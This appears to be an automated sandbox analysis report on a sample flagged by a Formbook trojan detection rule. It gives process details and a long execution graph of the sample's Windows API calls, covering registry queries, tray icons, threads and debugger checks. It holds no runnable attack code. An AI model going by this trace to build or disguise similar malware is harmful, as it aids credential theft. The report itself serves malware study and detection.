                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:06:46:34
                                              Start date:25/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:2.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:171
                                                execution_graph 96100 771066 96105 77f8cf 96100->96105 96102 77106c 96138 792ec0 96102->96138 96106 77f8f0 96105->96106 96141 790083 96106->96141 96110 77f937 96151 7777c7 96110->96151 96113 7777c7 59 API calls 96114 77f94b 96113->96114 96115 7777c7 59 API calls 96114->96115 96116 77f955 96115->96116 96117 7777c7 59 API calls 96116->96117 96118 77f993 96117->96118 96119 7777c7 59 API calls 96118->96119 96120 77fa5e 96119->96120 96156 7860e7 96120->96156 96124 77fa90 96125 7777c7 59 API calls 96124->96125 96126 77fa9a 96125->96126 96184 78ff1e 96126->96184 96128 77fae1 96129 77faf1 GetStdHandle 96128->96129 96130 77fb3d 96129->96130 96131 7b4904 96129->96131 96132 77fb45 OleInitialize 96130->96132 96131->96130 96133 7b490d 96131->96133 96132->96102 96191 7d6be1 64 API calls Mailbox 96133->96191 96135 7b4914 96192 7d72b0 CreateThread 96135->96192 96137 7b4920 CloseHandle 96137->96132 96264 792dc4 96138->96264 96140 771076 96193 79015c 96141->96193 96144 79015c 59 API calls 96145 7900c5 96144->96145 96146 7777c7 59 API calls 96145->96146 96147 7900d1 96146->96147 96200 777d2c 96147->96200 96149 77f8f6 96150 7902e2 6 API calls 96149->96150 96150->96110 96152 790f36 Mailbox 59 API calls 96151->96152 96153 7777e8 96152->96153 96154 790f36 Mailbox 59 API calls 96153->96154 96155 7777f6 96154->96155 96155->96113 96157 7777c7 59 API calls 96156->96157 96158 7860f7 96157->96158 96159 7777c7 59 API calls 96158->96159 96160 7860ff 96159->96160 96259 785bfd 96160->96259 96163 785bfd 59 API calls 96164 78610f 96163->96164 96165 7777c7 59 API calls 96164->96165 96166 78611a 96165->96166 96167 790f36 Mailbox 59 API calls 96166->96167 96168 77fa68 96167->96168 96169 786259 96168->96169 96170 786267 96169->96170 96171 7777c7 59 API calls 96170->96171 96172 786272 96171->96172 96173 7777c7 59 API calls 96172->96173 96174 78627d 96173->96174 96175 7777c7 59 API calls 96174->96175 96176 786288 96175->96176 96177 7777c7 59 API calls 96176->96177 96178 786293 96177->96178 96179 785bfd 59 API calls 96178->96179 96180 78629e 96179->96180 96181 790f36 Mailbox 59 API calls 96180->96181 96182 7862a5 RegisterWindowMessageW 96181->96182 96182->96124 96185 78ff2e 96184->96185 96186 7c5ac5 96184->96186 96187 790f36 Mailbox 59 API calls 96185->96187 96262 7d9b90 60 API calls 96186->96262 96189 78ff36 96187->96189 96189->96128 96190 7c5ad0 96191->96135 96192->96137 96263 7d7296 65 API calls 96192->96263 96194 7777c7 59 API calls 96193->96194 96195 790167 96194->96195 96196 7777c7 59 API calls 96195->96196 96197 79016f 96196->96197 96198 7777c7 59 API calls 96197->96198 96199 7900bb 96198->96199 96199->96144 96201 777da5 96200->96201 96202 777d38 __wsetenvp 96200->96202 96213 777e8c 96201->96213 96204 777d73 96202->96204 96205 777d4e 96202->96205 96210 778189 96204->96210 96209 778087 59 API calls Mailbox 96205->96209 96208 777d56 _memmove 96208->96149 96209->96208 96217 790f36 96210->96217 96212 778193 96212->96208 96214 777e9a 96213->96214 96216 777ea3 _memmove 96213->96216 96214->96216 96255 777faf 96214->96255 96216->96208 96220 790f3e 96217->96220 96219 790f58 96219->96212 96220->96219 96222 790f5c std::exception::exception 96220->96222 96227 79588c 96220->96227 96244 793521 DecodePointer 96220->96244 96245 79871b RaiseException 96222->96245 96224 790f86 96246 798651 58 API calls _free 96224->96246 96226 790f98 96226->96212 96228 795907 96227->96228 96238 795898 96227->96238 96253 793521 DecodePointer 96228->96253 96230 79590d 96254 798ca8 58 API calls __getptd_noexit 96230->96254 96233 7958cb RtlAllocateHeap 96234 7958ff 96233->96234 96233->96238 96234->96220 96236 7958a3 96236->96238 96247 79a2eb 58 API calls __NMSG_WRITE 96236->96247 96248 79a348 58 API calls 7 library calls 96236->96248 96249 79321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96236->96249 96237 7958f3 96251 798ca8 58 API calls __getptd_noexit 96237->96251 96238->96233 96238->96236 96238->96237 96242 7958f1 96238->96242 96250 793521 DecodePointer 96238->96250 96252 798ca8 58 API calls __getptd_noexit 96242->96252 96244->96220 96245->96224 96246->96226 96247->96236 96248->96236 96250->96238 96251->96242 96252->96234 96253->96230 96254->96234 96256 777fc2 96255->96256 96258 777fbf _memmove 96255->96258 96257 790f36 Mailbox 59 API calls 96256->96257 96257->96258 96258->96216 96260 7777c7 59 API calls 96259->96260 96261 785c05 96260->96261 96261->96163 96262->96190 96265 792dd0 __setmbcp 96264->96265 96272 793397 96265->96272 96271 792df7 __setmbcp 96271->96140 96289 799d8b 96272->96289 96274 792dd9 96275 792e08 DecodePointer DecodePointer 96274->96275 96276 792e35 96275->96276 96277 792de5 96275->96277 96276->96277 96335 798924 59 API calls 2 library calls 96276->96335 96286 792e02 96277->96286 96279 792e98 EncodePointer EncodePointer 96279->96277 96280 792e6c 96280->96277 96284 792e86 EncodePointer 96280->96284 96337 7989e4 61 API calls 2 library calls 96280->96337 96281 792e47 96281->96279 96281->96280 96336 7989e4 61 API calls 2 library calls 96281->96336 96284->96279 96285 792e80 96285->96277 96285->96284 96338 7933a0 96286->96338 96290 799d9c 96289->96290 96291 799daf EnterCriticalSection 96289->96291 96296 799e13 96290->96296 96291->96274 96293 799da2 96293->96291 96320 793235 58 API calls 3 library calls 96293->96320 96297 799e1f __setmbcp 96296->96297 96298 799e28 96297->96298 96299 799e40 96297->96299 96321 79a2eb 58 API calls __NMSG_WRITE 96298->96321 96305 799e61 __setmbcp 96299->96305 96324 79899d 58 API calls 2 library calls 96299->96324 96301 799e2d 96322 79a348 58 API calls 7 library calls 96301->96322 96304 799e55 96307 799e6b 96304->96307 96308 799e5c 96304->96308 96305->96293 96306 799e34 96323 79321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96306->96323 96311 799d8b __lock 58 API calls 96307->96311 96325 798ca8 58 API calls __getptd_noexit 96308->96325 96313 799e72 96311->96313 96314 799e7f 96313->96314 96315 799e97 96313->96315 96326 799fab InitializeCriticalSectionAndSpinCount 96314->96326 96327 792ed5 96315->96327 96318 799e8b 96333 799eb3 LeaveCriticalSection _doexit 96318->96333 96321->96301 96322->96306 96324->96304 96325->96305 96326->96318 96328 792f07 __dosmaperr 96327->96328 96329 792ede RtlFreeHeap 96327->96329 96328->96318 96329->96328 96330 792ef3 96329->96330 96334 798ca8 58 API calls __getptd_noexit 96330->96334 96332 792ef9 GetLastError 96332->96328 96333->96305 96334->96332 96335->96281 96336->96280 96337->96285 96341 799ef5 LeaveCriticalSection 96338->96341 96340 792e07 96340->96271 96341->96340 96342 771016 96347 774ad2 96342->96347 96345 792ec0 __cinit 67 API calls 96346 771025 96345->96346 96348 790f36 Mailbox 59 API calls 96347->96348 96349 774ada 96348->96349 96350 77101b 96349->96350 96354 774a94 96349->96354 96350->96345 96355 774aaf 96354->96355 96356 774a9d 96354->96356 96358 774afe 96355->96358 96357 792ec0 __cinit 67 API calls 96356->96357 96357->96355 96359 7777c7 59 API calls 96358->96359 96360 774b16 GetVersionExW 96359->96360 96361 777d2c 59 API calls 96360->96361 96362 774b59 96361->96362 96363 777e8c 59 API calls 96362->96363 96372 774b86 96362->96372 96364 774b7a 96363->96364 96386 777886 96364->96386 96366 774bf1 GetCurrentProcess IsWow64Process 96367 774c0a 96366->96367 96368 774c20 96367->96368 96369 774c89 GetSystemInfo 96367->96369 96382 774c95 96368->96382 96373 774c56 96369->96373 96370 7adbbd 96372->96366 96372->96370 96373->96350 96375 774c32 96377 774c95 2 API calls 96375->96377 96376 774c7d GetSystemInfo 96378 774c47 96376->96378 96379 774c3a GetNativeSystemInfo 96377->96379 96378->96373 96380 774c4d FreeLibrary 96378->96380 96379->96378 96380->96373 96383 774c2e 96382->96383 96384 774c9e LoadLibraryA 96382->96384 96383->96375 96383->96376 96384->96383 96385 774caf GetProcAddress 96384->96385 96385->96383 96387 777894 96386->96387 96388 777e8c 59 API calls 96387->96388 96389 7778a4 96388->96389 96389->96372 96390 771055 96395 772649 96390->96395 96393 792ec0 __cinit 67 API calls 96394 771064 96393->96394 96396 7777c7 59 API calls 96395->96396 96397 7726b7 96396->96397 96402 773582 96397->96402 96399 772754 96401 77105a 96399->96401 96405 773416 59 API calls 2 library calls 96399->96405 96401->96393 96406 7735b0 96402->96406 96405->96399 96407 7735a1 96406->96407 96408 7735bd 96406->96408 96407->96399 96408->96407 96409 7735c4 RegOpenKeyExW 96408->96409 96409->96407 96410 7735de RegQueryValueExW 96409->96410 96411 773614 RegCloseKey 96410->96411 96412 7735ff 96410->96412 96411->96407 96412->96411 96413 7b44c8 96417 7c625a 96413->96417 96415 7b44d3 96416 7c625a 85 API calls 96415->96416 96416->96415 96422 7c6294 96417->96422 96425 7c6267 96417->96425 96418 7c6296 96456 779488 84 API calls Mailbox 96418->96456 96420 7c629b 96428 779997 96420->96428 96422->96415 96425->96418 96425->96420 96425->96422 96426 7c628e 96425->96426 96455 779700 59 API calls _wcsstr 96426->96455 96429 7799b1 96428->96429 96430 7799ab 96428->96430 96431 7af92c __i64tow 96429->96431 96432 7799f9 96429->96432 96434 7799b7 __itow 96429->96434 96438 7af833 96429->96438 96446 777c8e 96430->96446 96461 793818 83 API calls 4 library calls 96432->96461 96436 790f36 Mailbox 59 API calls 96434->96436 96437 7799d1 96436->96437 96437->96430 96457 777f41 96437->96457 96439 790f36 Mailbox 59 API calls 96438->96439 96444 7af8ab Mailbox _wcscpy 96438->96444 96441 7af878 96439->96441 96442 790f36 Mailbox 59 API calls 96441->96442 96443 7af89e 96442->96443 96443->96444 96445 777f41 59 API calls 96443->96445 96462 793818 83 API calls 4 library calls 96444->96462 96445->96444 96447 777ca0 96446->96447 96448 7aefc4 96446->96448 96463 777bb1 96447->96463 96469 7c7f03 59 API calls _memmove 96448->96469 96451 777cac 96451->96422 96452 7aefce 96470 7781a7 96452->96470 96454 7aefd6 Mailbox 96455->96422 96456->96420 96458 777f50 __wsetenvp _memmove 96457->96458 96459 790f36 Mailbox 59 API calls 96458->96459 96460 777f8e 96459->96460 96460->96430 96461->96434 96462->96431 96464 777bbf 96463->96464 96468 777be5 _memmove 96463->96468 96465 790f36 Mailbox 59 API calls 96464->96465 96464->96468 96466 777c34 96465->96466 96467 790f36 Mailbox 59 API calls 96466->96467 96467->96468 96468->96451 96469->96452 96471 7781b2 96470->96471 96472 7781ba 96470->96472 96474 7780d7 59 API calls 2 library calls 96471->96474 96472->96454 96474->96472 96475 773633 96476 77366a 96475->96476 96477 7736e5 96476->96477 96478 7736e7 96476->96478 96479 773688 96476->96479 96480 7736ca DefWindowProcW 96477->96480 96481 7ad24c 96478->96481 96482 7736ed 96478->96482 96483 773695 96479->96483 96484 77375d PostQuitMessage 96479->96484 96490 7736d8 96480->96490 96525 7811d0 10 API calls Mailbox 96481->96525 96485 773715 SetTimer RegisterWindowMessageW 96482->96485 96486 7736f2 96482->96486 96487 7ad2bf 96483->96487 96488 7736a0 96483->96488 96484->96490 96485->96490 96493 77373e CreatePopupMenu 96485->96493 96491 7ad1ef 96486->96491 96492 7736f9 KillTimer 96486->96492 96540 7d281f 71 API calls _memset 96487->96540 96494 773767 96488->96494 96495 7736a8 96488->96495 96499 7ad228 MoveWindow 96491->96499 96500 7ad1f4 96491->96500 96520 7744cb Shell_NotifyIconW _memset 96492->96520 96493->96490 96523 774531 64 API calls _memset 96494->96523 96502 7736b3 96495->96502 96503 7ad2a4 96495->96503 96497 7ad273 96526 7811f3 351 API calls Mailbox 96497->96526 96499->96490 96507 7ad1f8 96500->96507 96508 7ad217 SetFocus 96500->96508 96510 7736be 96502->96510 96511 77374b 96502->96511 96503->96480 96539 7c7f5e 59 API calls Mailbox 96503->96539 96504 7ad2d1 96504->96480 96504->96490 96506 77375b 96506->96490 96507->96510 96512 7ad201 96507->96512 96508->96490 96509 77370c 96521 773114 DeleteObject DestroyWindow Mailbox 96509->96521 96510->96480 96527 7744cb Shell_NotifyIconW _memset 96510->96527 96522 7745df 81 API calls _memset 96511->96522 96524 7811d0 10 API calls Mailbox 96512->96524 96518 7ad298 96528 7743db 96518->96528 96520->96509 96521->96490 96522->96506 96523->96506 96524->96490 96525->96497 96526->96510 96527->96518 96529 774406 _memset 96528->96529 96541 774213 96529->96541 96533 7744a5 Shell_NotifyIconW 96535 7744b3 96533->96535 96534 7744c1 Shell_NotifyIconW 96534->96535 96545 77410d 96535->96545 96536 77448b 96536->96533 96536->96534 96538 7744ba 96538->96477 96539->96477 96540->96504 96542 774227 96541->96542 96543 7ad568 96541->96543 96542->96536 96567 7d302e 62 API calls _W_store_winword 96542->96567 96543->96542 96544 7ad571 DestroyIcon 96543->96544 96544->96542 96546 774129 96545->96546 96566 774200 Mailbox 96545->96566 96568 777b76 96546->96568 96549 774144 96551 777d2c 59 API calls 96549->96551 96550 7ad50d LoadStringW 96553 7ad527 96550->96553 96552 774159 96551->96552 96552->96553 96554 77416a 96552->96554 96555 777c8e 59 API calls 96553->96555 96556 774205 96554->96556 96557 774174 96554->96557 96560 7ad531 96555->96560 96558 7781a7 59 API calls 96556->96558 96559 777c8e 59 API calls 96557->96559 96563 77417e _memset _wcscpy 96558->96563 96559->96563 96560->96563 96573 777e0b 96560->96573 96562 7ad553 96565 777e0b 59 API calls 96562->96565 96564 7741e6 Shell_NotifyIconW 96563->96564 96564->96566 96565->96563 96566->96538 96567->96536 96569 790f36 Mailbox 59 API calls 96568->96569 96570 777b9b 96569->96570 96571 778189 59 API calls 96570->96571 96572 774137 96571->96572 96572->96549 96572->96550 96574 777e1f 96573->96574 96575 7af0a3 96573->96575 96580 777db0 96574->96580 96577 778189 59 API calls 96575->96577 96579 7af0ae __wsetenvp _memmove 96577->96579 96578 777e2a 96578->96562 96581 777dbf __wsetenvp 96580->96581 96582 778189 59 API calls 96581->96582 96583 777dd0 _memmove 96581->96583 96584 7af060 _memmove 96582->96584 96583->96578 96585 77107d 96590 7771eb 96585->96590 96587 77108c 96588 792ec0 __cinit 67 API calls 96587->96588 96589 771096 96588->96589 96591 7771fb __ftell_nolock 96590->96591 96592 7777c7 59 API calls 96591->96592 96593 7772b1 96592->96593 96621 774864 96593->96621 96595 7772ba 96628 79068b 96595->96628 96598 777e0b 59 API calls 96599 7772d3 96598->96599 96634 773f84 96599->96634 96602 7777c7 59 API calls 96603 7772eb 96602->96603 96640 777eec 96603->96640 96605 7772f4 RegOpenKeyExW 96606 7aec0a RegQueryValueExW 96605->96606 96610 777316 Mailbox 96605->96610 96607 7aec9c RegCloseKey 96606->96607 96608 7aec27 96606->96608 96607->96610 96619 7aecae _wcscat Mailbox __wsetenvp 96607->96619 96609 790f36 Mailbox 59 API calls 96608->96609 96611 7aec40 96609->96611 96610->96587 96644 77538e 96611->96644 96614 7aec68 96615 777d2c 59 API calls 96614->96615 96616 7aec82 96615->96616 96616->96607 96617 777f41 59 API calls 96617->96619 96618 773f84 59 API calls 96618->96619 96619->96610 96619->96617 96619->96618 96620 777b52 59 API calls 96619->96620 96620->96619 96647 7a1ac0 96621->96647 96624 777f41 59 API calls 96625 774897 96624->96625 96649 7748ae 96625->96649 96627 7748a1 Mailbox 96627->96595 96629 7a1ac0 __ftell_nolock 96628->96629 96630 790698 GetFullPathNameW 96629->96630 96631 7906ba 96630->96631 96632 777d2c 59 API calls 96631->96632 96633 7772c5 96632->96633 96633->96598 96635 773f92 96634->96635 96639 773fb4 _memmove 96634->96639 96637 790f36 Mailbox 59 API calls 96635->96637 96636 790f36 Mailbox 59 API calls 96638 773fc8 96636->96638 96637->96639 96638->96602 96639->96636 96641 777f06 96640->96641 96642 777ef9 96640->96642 96643 790f36 Mailbox 59 API calls 96641->96643 96642->96605 96643->96642 96645 790f36 Mailbox 59 API calls 96644->96645 96646 7753a0 RegQueryValueExW 96645->96646 96646->96614 96646->96616 96648 774871 GetModuleFileNameW 96647->96648 96648->96624 96650 7a1ac0 __ftell_nolock 96649->96650 96651 7748bb GetFullPathNameW 96650->96651 96652 7748f7 96651->96652 96653 7748da 96651->96653 96654 777eec 59 API calls 96652->96654 96655 777d2c 59 API calls 96653->96655 96656 7748e6 96654->96656 96655->96656 96657 777886 59 API calls 96656->96657 96658 7748f2 96657->96658 96658->96627 96659 797dd3 96660 797ddf __setmbcp 96659->96660 96696 799f88 GetStartupInfoW 96660->96696 96662 797de4 96698 798cfc GetProcessHeap 96662->96698 96664 797e3c 96665 797e47 96664->96665 96781 797f23 58 API calls 3 library calls 96664->96781 96699 799c66 96665->96699 96668 797e4d 96669 797e58 __RTC_Initialize 96668->96669 96782 797f23 58 API calls 3 library calls 96668->96782 96720 79d752 96669->96720 96672 797e67 96673 797e73 GetCommandLineW 96672->96673 96783 797f23 58 API calls 3 library calls 96672->96783 96739 7a50a3 GetEnvironmentStringsW 96673->96739 96677 797e72 96677->96673 96679 797e8d 96680 797e98 96679->96680 96784 793235 58 API calls 3 library calls 96679->96784 96749 7a4ed8 96680->96749 96683 797e9e 96684 797ea9 96683->96684 96785 793235 58 API calls 3 library calls 96683->96785 96763 79326f 96684->96763 96687 797eb1 96688 797ebc __wwincmdln 96687->96688 96786 793235 58 API calls 3 library calls 96687->96786 96769 77492e 96688->96769 96691 797ed0 96692 797edf 96691->96692 96787 7934d8 58 API calls _doexit 96691->96787 96788 793260 58 API calls _doexit 96692->96788 96695 797ee4 __setmbcp 96697 799f9e 96696->96697 96697->96662 96698->96664 96789 793307 36 API calls 2 library calls 96699->96789 96701 799c6b 96790 799ebc InitializeCriticalSectionAndSpinCount __ioinit 96701->96790 96703 799c70 96704 799c74 96703->96704 96792 799f0a TlsAlloc 96703->96792 96791 799cdc 61 API calls 2 library calls 96704->96791 96707 799c79 96707->96668 96708 799c86 96708->96704 96709 799c91 96708->96709 96793 798955 96709->96793 96712 799cd3 96801 799cdc 61 API calls 2 library calls 96712->96801 96715 799cd8 96715->96668 96716 799cb2 96716->96712 96717 799cb8 96716->96717 96800 799bb3 58 API calls 4 library calls 96717->96800 96719 799cc0 GetCurrentThreadId 96719->96668 96721 79d75e __setmbcp 96720->96721 96722 799d8b __lock 58 API calls 96721->96722 96723 79d765 96722->96723 96724 798955 __calloc_crt 58 API calls 96723->96724 96725 79d776 96724->96725 96726 79d7e1 GetStartupInfoW 96725->96726 96727 79d781 @_EH4_CallFilterFunc@8 __setmbcp 96725->96727 96733 79d7f6 96726->96733 96736 79d925 96726->96736 96727->96672 96728 79d9ed 96815 79d9fd LeaveCriticalSection _doexit 96728->96815 96730 798955 __calloc_crt 58 API calls 96730->96733 96731 79d972 GetStdHandle 96731->96736 96732 79d985 GetFileType 96732->96736 96733->96730 96735 79d844 96733->96735 96733->96736 96734 79d878 GetFileType 96734->96735 96735->96734 96735->96736 96813 799fab InitializeCriticalSectionAndSpinCount 96735->96813 96736->96728 96736->96731 96736->96732 96814 799fab InitializeCriticalSectionAndSpinCount 96736->96814 96740 797e83 96739->96740 96741 7a50b4 96739->96741 96745 7a4c9b GetModuleFileNameW 96740->96745 96816 79899d 58 API calls 2 library calls 96741->96816 96743 7a50da _memmove 96744 7a50f0 FreeEnvironmentStringsW 96743->96744 96744->96740 96746 7a4ccf _wparse_cmdline 96745->96746 96748 7a4d0f _wparse_cmdline 96746->96748 96817 79899d 58 API calls 2 library calls 96746->96817 96748->96679 96750 7a4ef1 __wsetenvp 96749->96750 96754 7a4ee9 96749->96754 96751 798955 __calloc_crt 58 API calls 96750->96751 96759 7a4f1a __wsetenvp 96751->96759 96752 7a4f71 96753 792ed5 _free 58 API calls 96752->96753 96753->96754 96754->96683 96755 798955 __calloc_crt 58 API calls 96755->96759 96756 7a4f96 96758 792ed5 _free 58 API calls 96756->96758 96758->96754 96759->96752 96759->96754 96759->96755 96759->96756 96760 7a4fad 96759->96760 96818 7a4787 58 API calls 2 library calls 96759->96818 96819 798f46 IsProcessorFeaturePresent 96760->96819 96762 7a4fb9 96762->96683 96765 79327b __IsNonwritableInCurrentImage 96763->96765 96842 79a651 96765->96842 96766 793299 __initterm_e 96767 792ec0 __cinit 67 API calls 96766->96767 96768 7932b8 __cinit __IsNonwritableInCurrentImage 96766->96768 96767->96768 96768->96687 96770 7749e7 96769->96770 96771 774948 96769->96771 96770->96691 96772 774982 IsThemeActive 96771->96772 96845 7934ec 96772->96845 96776 7749ae 96857 774a5b SystemParametersInfoW SystemParametersInfoW 96776->96857 96778 7749ba 96858 773b4c 96778->96858 96780 7749c2 SystemParametersInfoW 96780->96770 96781->96665 96782->96669 96783->96677 96787->96692 96788->96695 96789->96701 96790->96703 96791->96707 96792->96708 96795 79895c 96793->96795 96796 798997 96795->96796 96798 79897a 96795->96798 96802 7a5376 96795->96802 96796->96712 96799 799f66 TlsSetValue 96796->96799 96798->96795 96798->96796 96810 79a2b2 Sleep 96798->96810 96799->96716 96800->96719 96801->96715 96803 7a5381 96802->96803 96808 7a539c 96802->96808 96804 7a538d 96803->96804 96803->96808 96811 798ca8 58 API calls __getptd_noexit 96804->96811 96806 7a53ac RtlAllocateHeap 96807 7a5392 96806->96807 96806->96808 96807->96795 96808->96806 96808->96807 96812 793521 DecodePointer 96808->96812 96810->96798 96811->96807 96812->96808 96813->96735 96814->96736 96815->96727 96816->96743 96817->96748 96818->96759 96820 798f51 96819->96820 96825 798dd9 96820->96825 96824 798f6c 96824->96762 96826 798df3 _memset __call_reportfault 96825->96826 96827 798e13 IsDebuggerPresent 96826->96827 96833 79a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 96827->96833 96829 798ed7 __call_reportfault 96834 79c776 96829->96834 96831 798efa 96832 79a2c0 GetCurrentProcess TerminateProcess 96831->96832 96832->96824 96833->96829 96835 79c77e 96834->96835 96836 79c780 IsProcessorFeaturePresent 96834->96836 96835->96831 96838 7a5a8a 96836->96838 96841 7a5a39 5 API calls 2 library calls 96838->96841 96840 7a5b6d 96840->96831 96841->96840 96843 79a654 EncodePointer 96842->96843 96843->96843 96844 79a66e 96843->96844 96844->96766 96846 799d8b __lock 58 API calls 96845->96846 96847 7934f7 DecodePointer EncodePointer 96846->96847 96910 799ef5 LeaveCriticalSection 96847->96910 96849 7749a7 96850 793554 96849->96850 96851 793578 96850->96851 96852 79355e 96850->96852 96851->96776 96852->96851 96911 798ca8 58 API calls __getptd_noexit 96852->96911 96854 793568 96912 798f36 9 API calls _wprintf 96854->96912 96856 793573 96856->96776 96857->96778 96859 773b59 __ftell_nolock 96858->96859 96860 7777c7 59 API calls 96859->96860 96861 773b63 GetCurrentDirectoryW 96860->96861 96913 773778 96861->96913 96863 773b8c IsDebuggerPresent 96864 7ad3dd MessageBoxA 96863->96864 96865 773b9a 96863->96865 96867 7ad3f7 96864->96867 96865->96867 96868 773bb7 96865->96868 96897 773c73 96865->96897 96866 773c7a SetCurrentDirectoryW 96869 773c87 Mailbox 96866->96869 97112 777373 59 API calls Mailbox 96867->97112 96994 7773e5 96868->96994 96869->96780 96872 7ad407 96878 7ad41d SetCurrentDirectoryW 96872->96878 96874 773bd5 GetFullPathNameW 96875 777d2c 59 API calls 96874->96875 96876 773c10 96875->96876 97010 780a8d 96876->97010 96878->96869 96880 773c2e 96881 773c38 96880->96881 97113 7d4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 96880->97113 97026 773a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 96881->97026 96884 7ad43a 96884->96881 96887 7ad44b 96884->96887 96889 774864 61 API calls 96887->96889 96891 7ad453 96889->96891 96897->96866 96910->96849 96911->96854 96912->96856 96914 7777c7 59 API calls 96913->96914 96915 77378e 96914->96915 97114 773d43 96915->97114 96917 7737ac 96918 774864 61 API calls 96917->96918 96919 7737c0 96918->96919 96920 777f41 59 API calls 96919->96920 96921 7737cd 96920->96921 97128 774f3d 96921->97128 96924 7ad2de 97195 7d9604 96924->97195 96925 7737ee Mailbox 96928 7781a7 59 API calls 96925->96928 96931 773801 96928->96931 96929 7ad2fd 96930 792ed5 _free 58 API calls 96929->96930 96933 7ad30a 96930->96933 97152 7793ea 96931->97152 96935 774faa 84 API calls 96933->96935 96937 7ad313 96935->96937 96941 773ee2 59 API calls 96937->96941 96938 777f41 59 API calls 96939 77381a 96938->96939 97155 778620 96939->97155 96943 7ad32e 96941->96943 96942 77382c Mailbox 96944 777f41 59 API calls 96942->96944 96945 773ee2 59 API calls 96943->96945 96946 773852 96944->96946 96947 7ad34a 96945->96947 96948 778620 69 API calls 96946->96948 96949 774864 61 API calls 96947->96949 96951 773861 Mailbox 96948->96951 96950 7ad36f 96949->96950 96952 773ee2 59 API calls 96950->96952 96954 7777c7 59 API calls 96951->96954 96953 7ad37b 96952->96953 96955 7781a7 59 API calls 96953->96955 96956 77387f 96954->96956 96957 7ad389 96955->96957 97159 773ee2 96956->97159 96959 773ee2 59 API calls 96957->96959 96961 7ad398 96959->96961 96967 7781a7 59 API calls 96961->96967 96963 773899 96963->96937 96964 7738a3 96963->96964 96965 79307d _W_store_winword 60 API calls 96964->96965 96966 7738ae 96965->96966 96966->96943 96968 7738b8 96966->96968 96969 7ad3ba 96967->96969 96970 79307d _W_store_winword 60 API calls 96968->96970 96971 773ee2 59 API calls 96969->96971 96972 7738c3 96970->96972 96973 7ad3c7 96971->96973 96972->96947 96974 7738cd 96972->96974 96973->96973 96975 79307d _W_store_winword 60 API calls 96974->96975 96976 7738d8 96975->96976 96976->96961 96977 773919 96976->96977 96979 773ee2 59 API calls 96976->96979 96977->96961 96978 773926 96977->96978 97175 77942e 96978->97175 96980 7738fc 96979->96980 96982 7781a7 59 API calls 96980->96982 96984 77390a 96982->96984 96986 773ee2 59 API calls 96984->96986 96986->96977 96989 7793ea 59 API calls 96990 773961 96989->96990 96990->96989 96991 779040 60 API calls 96990->96991 96992 773ee2 59 API calls 96990->96992 96993 7739a7 Mailbox 96990->96993 96991->96990 96992->96990 96993->96863 96995 7773f2 __ftell_nolock 96994->96995 96996 7aed7b _memset 96995->96996 96997 77740b 96995->96997 96999 7aed97 GetOpenFileNameW 96996->96999 96998 7748ae 60 API calls 96997->96998 97000 777414 96998->97000 97001 7aede6 96999->97001 97976 790911 97000->97976 97003 777d2c 59 API calls 97001->97003 97006 7aedfb 97003->97006 97006->97006 97007 777429 97994 7769ca 97007->97994 97011 780a9a __ftell_nolock 97010->97011 98319 776ee0 97011->98319 97013 780a9f 97014 773c26 97013->97014 98330 7812fe 89 API calls 97013->98330 97014->96872 97014->96880 97016 780aac 97016->97014 98331 784047 91 API calls Mailbox 97016->98331 97018 780ab5 97018->97014 97019 780ab9 GetFullPathNameW 97018->97019 97020 777d2c 59 API calls 97019->97020 97021 780ae5 97020->97021 97027 773ac2 LoadImageW RegisterClassExW 97026->97027 97028 7ad3cc 97026->97028 98334 773041 7 API calls 97027->98334 98335 7748fe LoadImageW EnumResourceNamesW 97028->98335 97031 773b46 97032 7ad3d5 97112->96872 97113->96884 97115 773d50 __ftell_nolock 97114->97115 97116 777d2c 59 API calls 97115->97116 97127 773eb6 Mailbox 97115->97127 97118 773d82 97116->97118 97121 773db8 Mailbox 97118->97121 97236 777b52 97118->97236 97119 777b52 59 API calls 97119->97121 97120 773e89 97122 777f41 59 API calls 97120->97122 97120->97127 97121->97119 97121->97120 97123 777f41 59 API calls 97121->97123 97126 773f84 59 API calls 97121->97126 97121->97127 97124 773eaa 97122->97124 97123->97121 97125 773f84 59 API calls 97124->97125 97125->97127 97126->97121 97127->96917 97239 774d13 97128->97239 97133 7adc3f 97135 774faa 84 API calls 97133->97135 97134 774f68 LoadLibraryExW 97249 774cc8 97134->97249 97137 7adc46 97135->97137 97139 774cc8 3 API calls 97137->97139 97141 7adc4e 97139->97141 97275 77506b 97141->97275 97142 774f8f 97142->97141 97143 774f9b 97142->97143 97144 774faa 84 API calls 97143->97144 97146 7737e6 97144->97146 97146->96924 97146->96925 97149 7adc75 97283 775027 97149->97283 97151 7adc82 97153 790f36 Mailbox 59 API calls 97152->97153 97154 77380d 97153->97154 97154->96938 97157 77862b 97155->97157 97156 778652 97156->96942 97157->97156 97710 778b13 69 API calls Mailbox 97157->97710 97160 773f05 97159->97160 97161 773eec 97159->97161 97163 777d2c 59 API calls 97160->97163 97162 7781a7 59 API calls 97161->97162 97164 77388b 97162->97164 97163->97164 97165 79307d 97164->97165 97166 793089 97165->97166 97167 7930fe 97165->97167 97174 7930ae 97166->97174 97711 798ca8 58 API calls __getptd_noexit 97166->97711 97713 793110 60 API calls 4 library calls 97167->97713 97170 79310b 97170->96963 97171 793095 97712 798f36 9 API calls _wprintf 97171->97712 97173 7930a0 97173->96963 97174->96963 97176 779436 97175->97176 97177 790f36 Mailbox 59 API calls 97176->97177 97178 779444 97177->97178 97179 773936 97178->97179 97714 77935c 59 API calls Mailbox 97178->97714 97181 7791b0 97179->97181 